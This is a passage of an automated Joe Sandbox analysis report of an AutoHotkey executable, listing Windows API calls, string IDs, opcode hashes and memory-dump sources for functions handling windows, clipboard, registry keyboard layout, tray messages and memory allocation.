                                      • IsWindowVisible.USER32(00000000), ref: 0048437F
                                        • Part of subcall function 004844A0: GetForegroundWindow.USER32(?,?,?,?,0040F2F8,004D8348,?,?,004B0CF8,004B0CF8,00000000), ref: 004844F7
                                        • Part of subcall function 004844A0: IsWindowVisible.USER32(00000000), ref: 00484513
                                      Strings
                                      Similarity
                                      • API ID: Window$ForegroundVisible
                                      • String ID: ?-C
                                      • API String ID: 4078700383-529084794
                                      • Opcode ID: 2bcaca533c319f157176ebc2ab5121f4f9eccac48239b7959bd7bd3867e65a3f
                                      • Instruction ID: e7df5b706dff28624cba392fe7f5c9c92e05ac259fbb47937f3dab680ecd774b
                                      • Opcode Fuzzy Hash: 2bcaca533c319f157176ebc2ab5121f4f9eccac48239b7959bd7bd3867e65a3f
                                      • Instruction Fuzzy Hash: F121B162B002175BCB21FE55D841A2FB7E99BD2765F04495AFC0097781E77CDC8483AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _wcsncpy.LIBCMT ref: 0041145B
                                        • Part of subcall function 00411570: _memset.LIBCMT ref: 00411587
                                        • Part of subcall function 004118C0: __wcsicoll.LIBCMT ref: 00411928
                                        • Part of subcall function 004118C0: GetKeyboardLayout.USER32(00000000), ref: 00411943
                                      Strings
                                      Similarity
                                      • API ID: KeyboardLayout__wcsicoll_memset_wcsncpy
                                      • String ID: & $~
                                      • API String ID: 3335490538-4238529414
                                      • Opcode ID: 156e6ded4cc92f8d1fd6ad7fa3b91f5d95bb7bbe1e935d71df4820a700e268ca
                                      • Instruction ID: 12d5d7b9b1af21647edd01bb51ffe43c259ed73faf075e8769fdf25e971ef760
                                      • Opcode Fuzzy Hash: 156e6ded4cc92f8d1fd6ad7fa3b91f5d95bb7bbe1e935d71df4820a700e268ca
                                      • Instruction Fuzzy Hash: 79312876A443446BDB30E746C885AFF73E9DBD9314F40481EFA5983351F27898C583AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _wcschr
                                      • String ID: MCA$Parameter #3 invalid.
                                      • API String ID: 2691759472-426094000
                                      • Opcode ID: 095c56a03202e7ae516ffee4e4c558eb86b170fb80caa82cc50e579f8528c177
                                      • Instruction ID: 66d9a94311a100ac9d1fdc1c1a02357e71ebad1a0c56e47cd88ad610425ba93c
                                      • Opcode Fuzzy Hash: 095c56a03202e7ae516ffee4e4c558eb86b170fb80caa82cc50e579f8528c177
                                      • Instruction Fuzzy Hash: DB31D3347083649FEB24CB1AE4487A3B7E1AB81314F98489FE9854B352C37DDC41C76A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _wcsncpy
                                      • String ID: Line#$--->
                                      • API String ID: 1735881322-1677359465
                                      • Opcode ID: 88c64845ce57c21b478698e4940f62b280d9cfec558ca7d7eae52d0798e1ba5c
                                      • Instruction ID: 825ff8b15a29b67e8dbd47c1069d68af603ebbec2116dc6db00848bea2936222
                                      • Opcode Fuzzy Hash: 88c64845ce57c21b478698e4940f62b280d9cfec558ca7d7eae52d0798e1ba5c
                                      • Instruction Fuzzy Hash: A22101717053015FC718DE298886BABB3E5EBC8304F18562EEA56D3390D6B4AC09879A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0042B40A
                                      • _wcschr.LIBCMT ref: 0042B425
                                      Strings
                                      Similarity
                                      • API ID: AttributesFile_wcschr
                                      • String ID: .ahk
                                      • API String ID: 3504862186-1610153849
                                      • Opcode ID: 19497a09d5214a8a8e2b3604a52d9abf62eda482ff5dd22e3492dcf1208907e8
                                      • Instruction ID: 9fbf4377431b103dc8eb4b848d934524a350b2c652ae0b9910b49c70eb1c4229
                                      • Opcode Fuzzy Hash: 19497a09d5214a8a8e2b3604a52d9abf62eda482ff5dd22e3492dcf1208907e8
                                      • Instruction Fuzzy Hash: 1E21F631A002268BC710DF28EC8196B7364EF81318F41462EE946C7272E738E966C7D9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • InsertMenuItemW.USER32(00000000,00000000,00000001,00000030), ref: 00476722
                                        • Part of subcall function 00477020: __wcsicoll.LIBCMT ref: 00477048
                                      • GetMenuItemCount.USER32(00000000), ref: 0047670C
                                      Strings
                                      Similarity
                                      • API ID: ItemMenu$CountInsert__wcsicoll
                                      • String ID: 0
                                      • API String ID: 858756630-4108050209
                                      • Opcode ID: 7a11bf2055d5bf36ca9172e3f2b414399eb22f143072960c14da987f1530301c
                                      • Instruction ID: 7b4776afdb01a585c8b44e5c4e53bbae3461c34a55470b2501b8c736af6ea667
                                      • Opcode Fuzzy Hash: 7a11bf2055d5bf36ca9172e3f2b414399eb22f143072960c14da987f1530301c
                                      • Instruction Fuzzy Hash: 59216D716187019FD724CF69D404A6BBBE8EB88720F008A1EF89AC7790D774E904CB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: ErrorLast__itow
                                      • String ID: 0
                                      • API String ID: 2292283701-4108050209
                                      • Opcode ID: 9fcbe08d7aea0c672310a0b02af8be1dafefa8270c26c951cfadd9da7ab8edda
                                      • Instruction ID: 19ef22b64f1cf6183a4932d0585aeeabbedf8743b5dfe9319148beeff767fc39
                                      • Opcode Fuzzy Hash: 9fcbe08d7aea0c672310a0b02af8be1dafefa8270c26c951cfadd9da7ab8edda
                                      • Instruction Fuzzy Hash: 97214A74E012089BDB14DF98D881BEEBBB0FB48311F10429AED15A73A1D7746845CBAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _free
                                      • String ID: An object.$Invalid value.
                                      • API String ID: 269201875-731773362
                                      • Opcode ID: 43c5130273e3b50bcf858397e4e1b643dfddc0baefce76be0c4493b34f4c96b1
                                      • Instruction ID: 9951c2e04d630b0db94df0ec7473f3ecfde6cc0f8c61dc40ddec4f426a87d1f4
                                      • Opcode Fuzzy Hash: 43c5130273e3b50bcf858397e4e1b643dfddc0baefce76be0c4493b34f4c96b1
                                      • Instruction Fuzzy Hash: A211AC70504B815BC731DF28D008B97BBE0AF55314F088E5EE0D68B791C3A8FA89CB96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RegQueryValueExW.ADVAPI32(?,Layout File,00000000,00000000), ref: 00481508
                                      • RegCloseKey.ADVAPI32(00000000,?,Layout File,00000000,00000000), ref: 00481513
                                      Strings
                                      Similarity
                                      • API ID: CloseQueryValue
                                      • String ID: Layout File
                                      • API String ID: 3356406503-1055935358
                                      • Opcode ID: 78f30aa957dddf8067f314ef7a1daf016dab6a80fef24d3b39fa77404847fce2
                                      • Instruction ID: 4cb2bb99f9f12cc88d4c308a13ed4318a889be12cbef2e7636e31a1c10d332f1
                                      • Opcode Fuzzy Hash: 78f30aa957dddf8067f314ef7a1daf016dab6a80fef24d3b39fa77404847fce2
                                      • Instruction Fuzzy Hash: B90144B0214601AAD724EF69D88471BB7E8EF98350F104C2FE487C32A0E77498818759
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • mciSendStringW.WINMM(status AHK_PlayMe mode,?,00000208,00000000), ref: 0044B7EC
                                      • mciSendStringW.WINMM(close AHK_PlayMe,00000000,00000000,00000000), ref: 0044B813
                                      Strings
                                      Similarity
                                      • API ID: SendString
                                      • String ID: status AHK_PlayMe mode$stopped
                                      • API String ID: 890592661-3192028569
                                      • Opcode ID: d79109f9da8f7a02a214fd08ee76e48582b8cd1eb4115f964b35b508fb7cb5ec
                                      • Instruction ID: 0174611f71dcfae99c37b15dba9e23276e2012e44b48fb816364da9649d55bf2
                                      • Opcode Fuzzy Hash: d79109f9da8f7a02a214fd08ee76e48582b8cd1eb4115f964b35b508fb7cb5ec
                                      • Instruction Fuzzy Hash: D1F0F62564030645FA20AB10CC82BF77362EFF0B58F44043FEA445B291F36AD589C2EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 00449337
                                        • Part of subcall function 0049A18D: RtlFreeHeap.NTDLL(00000000,00000000,?,0049DF53,00000000,?,0049F727,?,0047FFCE), ref: 0049A1A3
                                        • Part of subcall function 0049A18D: GetLastError.KERNEL32(00000000,?,0049DF53,00000000,?,0049F727,?,0047FFCE), ref: 0049A1B5
                                      • _malloc.LIBCMT ref: 00449346
                                      Strings
                                      Similarity
                                      • API ID: ErrorFreeHeapLast_free_malloc
                                      • String ID: Out of memory.
                                      • API String ID: 1323848136-4087320997
                                      • Opcode ID: dd0031c7b7fd3af9da1d7b6eeb367ef518b3abc0634d045907c2d6f1a48bae3a
                                      • Instruction ID: db5275d4cf7d323973f8cb355723b087375f29b9c77ac0f5b2352752b8431e50
                                      • Opcode Fuzzy Hash: dd0031c7b7fd3af9da1d7b6eeb367ef518b3abc0634d045907c2d6f1a48bae3a
                                      • Instruction Fuzzy Hash: 1F018F606482008BA310DF15C085A6BF7E5BF9A304F29845BE8864B392D679CC06A79F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetPropW.USER32(?,ahk_dlg), ref: 0047467D
                                        • Part of subcall function 00474090: GetClientRect.USER32(?,?), ref: 004740A0
                                        • Part of subcall function 00474090: GetWindowLongW.USER32(?,000000F0), ref: 004740A9
                                        • Part of subcall function 00474090: SendMessageW.USER32(?,0000130A,00000000,?), ref: 004740CC
                                        • Part of subcall function 00474090: SendMessageW.USER32(?,0000132C,00000000,00000000), ref: 004740D8
                                        • Part of subcall function 00474090: MapWindowPoints.USER32(?,?,?,00000002), ref: 00474144
                                      • MoveWindow.USER32(00000000,?,?,?,?,00000001,?,?), ref: 004746B3
                                      Strings
                                      Similarity
                                      • API ID: Window$MessageSend$ClientLongMovePointsPropRect
                                      • String ID: ahk_dlg
                                      • API String ID: 1880356802-2093416220
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00401072
                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 0040107A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: AvailableClipboardFormat
                                      • String ID: <<>>
                                      • API String ID: 778505046-913080871
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000,00404F56,?,?,00401093), ref: 004052EF
                                      • CloseClipboard.USER32 ref: 004052FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ClipboardCloseGlobalUnlock
                                      • String ID: GlobalLock
                                      • API String ID: 3794156920-2848605275
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004333E2
                                      • PostMessageW.USER32(00000000), ref: 004333E9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: FindMessagePostWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 2578315405-2988720461
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00433429
                                      • PostMessageW.USER32(00000000), ref: 00433430
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: FindMessagePostWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 2578315405-2988720461
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetSystemDefaultUILanguage.KERNEL32 ref: 0044F429
                                      • __swprintf.LIBCMT ref: 0044F439
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: DefaultLanguageSystem__swprintf
                                      • String ID: %04hX
                                      • API String ID: 1359733045-3571374829
                                      Uniqueness

                                      Uniqueness Score: -1.00%